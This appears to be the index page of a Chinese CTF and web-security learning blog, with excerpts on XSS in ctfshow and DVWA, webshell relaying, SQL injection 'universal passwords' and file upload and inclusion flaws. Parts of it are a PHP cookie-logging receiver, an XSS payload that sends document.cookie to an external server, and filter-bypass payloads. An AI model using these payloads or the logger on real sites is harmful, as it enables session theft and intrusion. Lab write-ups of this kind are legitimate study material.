GET->POST
好久没更新博客了,因为有些笔记写得确实难以入目,更多也是因为好久没静下心来学习了,等8月份忙完,会把一些还像人话的笔记整理一下,一起发上来。前天,做到新生赛的一个弱智RCE的时候,看到他本质就是一个一句话木马的时候,想到了用蚁剑去连。但是,里面是用$_GET,传入的密码,蚁剑连上也是空。想了很多弱智方法都连不上。这时,一位甜菜出现了。
只要把POST改为GET请求即可
1234567891011121314151617181920<?phphighlight_file(__FILE__);ini_set('max_execution_time', '100'); // 超时时间$url = 'http://localhost/test/rce.php'; // 一句话地址$pass = '2'; // 密码$data = $_POST['cmd']; // 中转密码echo file_get_contents($url.'?'.$pass.'= ...
XSS ctfshow
一、搭建一个接收XSS返回值的平台,虽然网上有现成的,但是我还是建议在自己的服务器上弄一个,也不麻烦,而且方便调试(方法很多大佬都教了,搜一下就好)
二、我自己服务器上的那个,写的index.php文件内容是
1234567<?php $cookie = $_GET['cookie']; $time = date('Y-m-d h:i:s', time()); $log = fopen("cookie.txt", "a"); fwrite($log,$time.': '. $cookie . "\n"); fclose($log);?>
我下面的payload都将是按照这个文件来的
三、具体操作也没啥了,插入点比较明显了,我下边会大部分只写payload(节约一下时间)
web3161<script>location.href="http://xx.xxx.xxx.xxx?cookie="+document.cook ...
DVWA之XSS
DVWA之XSSOK呀咱们也是打上靶场了先来整个XSS(Reflected)初级形态(low)的靶场1<script>alert('xxx')</script>
一串小代码直接弹窗,说明执行成功,毫无过滤,轻松拿下
中级形态(medium)的靶场1.一串小代码
1<script>alert('xxx')</script>
结果没运行,响应了一串Hello alert(‘xxx’),一看,爷的script呢?十成让这小可爱给我过滤了, 分析一下源码找一下证据,发现medium比low多了一行
1$name = str_replace( '<script>', '', $_GET[ 'name' ] );
喝,长大了!知道要过滤了。但是你过滤script关我Script什么事?拿下。
2.当然了也可以双写绕过
1<sc<script>ript>alert('xxx')</sc ...
js操作cookie
浏览器封装了一个document对象,其中存在一个cookie属性,所以我们可以通过document.cookie对cookie进行操作。具体操作1.看cookie:首先打开一个网站,f12,控制台,输入document.cookie,这个网站给你的cookie值就出现了,也可以输入个alert(document.cookie)让弹窗直接把cookie弹出来
2.写入cookie:控制台直接 document.cookie=“内容”,那么该内容就会被加入到cookie中
3.修改cookie:js没有提供直接修改cookie的办法,但是我们可以通过新建一个cookie,属性一样,把之前的cookie覆盖掉
4.删除cookie:将过期时间设置为以前的时间就行
xss
一 .XSS介绍恶意攻击者利用web页面的漏洞,插入一些恶意的代码,当用户访问页面的时候,代码就会执行,这个时候就达到了攻击的目的。
(JavaScript, Java ,VBScript, ActiveX, Flash)这些网页都可能存在该种漏洞
分类1.反射型
2.存储型
3.DOM型(基于html的DOM结构,其实也可以归纳为反射型)
二.XSS漏洞修复方法 1.HTML实体编码 2.使用白名单过滤掉用户输入的恶意字符 3.根据业务场景对症下药
三.小工具工具1:Beefhttp://beefproject.com一个挖漏洞项目,可以将它的hook.js通过XSS的方法被存储到某个网站,然后那个网站只要访问这个页面信息,那么整个网站就被监控了
工具2:XSS’ORhttp://xssor.io是一个在线XSS代码的转换工具,也可以发送伪造请求
万能密码
一.万能密码原理用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。针对此BBS论坛,当用户登录时,后台执行的数据库查询操作(SQL语句)是【Select user id,user type,email From usersWhere user id=’用户名’And password=’密码’】。由于网站后台在进行数据库査询的时候没有对单引号进行过滤,当输入用户名【admin】和万能密码【2’or’1】时,执行的SQL语句为 【Select user id,user type,email from users Where user id=’admin’And password=’2’or’1’】。同时,由于SQL语句中逻辑运算符具有优先级,【=】优先于【and】,【and】优先于【or】,目适用传递性。因此,此SQL语句在后台解析时,分成两句【Select user id,user type,email From users Where user id=’admin’ And password ...
文件上传漏洞常见函数
文件上传漏洞常见函数:1.deldot deldot函数为upload-lab中一个出现多次的函数,是一个自定义的函数,在common.php中有所定义:
123456789101112function deldot($s){ for($i = strlen($s)-1;$i>0;$i--){ $c = substr($s,$i,1); if($i == strlen($s)-1 and $c != '.'){ return $s; } if($c != '.'){ return substr($s,0,$i+1); } }}
读其源码可知,这个函数是将后边括号中的内容,从尾部开始,从后向前删除点.,直到该字符串的末尾字符不是.为止。
2.in_array1in_array(mixed $needle, array $haystack, bool $strict = false): bool
括号里的第一个参数$needle为待搜索值,$ ...
文件上传+包含漏洞
文件上传漏洞 在网站中常常会提供上传文件的功能,但在上传文件时我们可以上传一个恶意文件,比如常见的Weshell文件,可以通过该文件建立网络后门,这类文件上传成功后,便可以通过向网页发出命令,得到网页以及服务端的信息。也可以通过一些shell软件对网页进行连接来控制网站,常见的比如蚁剑,菜刀,weevely(kali系统自带,weevely是可以自动生成shell的),哥斯拉,冰蝎……
文件包含漏洞 编写网页时,编写者为了代码的简洁,避免代码的重复,通常会设置文件包含的功能(也就是可在一个文件中引用其他文件)。文件包含是在动态的包含文件,但是在包含过程中并没有对文件内容进行校验,导致包含了预期之外的文件,从而产生漏洞。
文件包含漏洞分类 本地文件包含漏洞(LFI){1.固定文件名 2.通过动态接口包含 }
远程文件包含漏洞
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post1$ hexo new "My New Post"
More info: Writing
Run server1$ hexo server
More info: Server
Generate static files1$ hexo generate
More info: Generating
Deploy to remote sites1$ hexo deploy
More info: Deployment